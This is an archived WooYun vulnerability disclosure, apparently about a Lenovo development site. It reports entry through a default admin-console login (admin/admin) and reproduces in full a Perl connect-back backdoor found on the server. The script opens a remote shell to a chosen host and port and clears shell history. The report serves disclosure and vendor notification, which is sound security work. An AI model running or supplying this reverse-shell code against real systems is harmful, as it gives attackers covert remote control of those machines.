乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-03: 细节已通知厂商并且等待厂商处理中 2015-04-07: 厂商已经确认,细节仅向厂商公开 2015-04-17: 细节向核心白帽子及相关领域专家公开 2015-04-27: 细节向普通白帽子公开 2015-05-07: 细节向实习白帽子公开 2015-05-22: 细节向公众公开
lenovo
1.站点:http://idinner1.dev.surepush.cn/
2.getshell存在默认配置admin-console管理接口admin/admin进入
3.发现一枚老外后门
#!/usr/bin/perluse IO::Socket;#IRAN HACKERS SABOTAGE Connect Back Shell #code by:LorD#We Are :LorD-C0d3r-NT ##e.code@SlackwareLinux:/home/programing$ perl dc.pl#--== ConnectBack Backdoor Shell vs 1.0 by Error Code ==--##Usage: dc.pl [Host] [Port]##Ex: dc.pl 127.0.0.1 2121#e.code@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121#--== ConnectBack Backdoor Shell vs 1.0 by Error Code ==--##[*] Resolving HostName#[*] Connecting... 127.0.0.1#[*] Spawning Shell#[*] Connected to remote host#bash-2.05b# nc -vv -l -p 2121#listening on [any] 2121 ...#connect to [127.0.0.1] from localhost [127.0.0.1] 2121#--== ConnectBack Backdoor vs 1.0 by Error Code ==--##--==Systeminfo==--#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux##--==Userinfo==--#uid=1001(error) gid=100(error) groups=100(error)##--==Directory==--#/root##--==Shell==--#$system = '/bin/sh';$ARGC=@ARGV; print "--== ConnectBack Backdoor Shell vs 1.0 Error Code ==-- \n\n"; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; print "[*] Resolving HostName\n";print "[*] Connecting... $ARGV[0] \n"; print "[*] Spawning Shell \n";print "[*] Connected to remote host \n";SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); print "--== ConnectBack Backdoor vs 1.0 by Error Code ==-- \n\n"; system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); system($system);#EOF
你们更专业。
危害等级:高
漏洞Rank:12
确认时间:2015-04-07 09:39
感谢您对联想安全工作的支持,谢谢。
暂无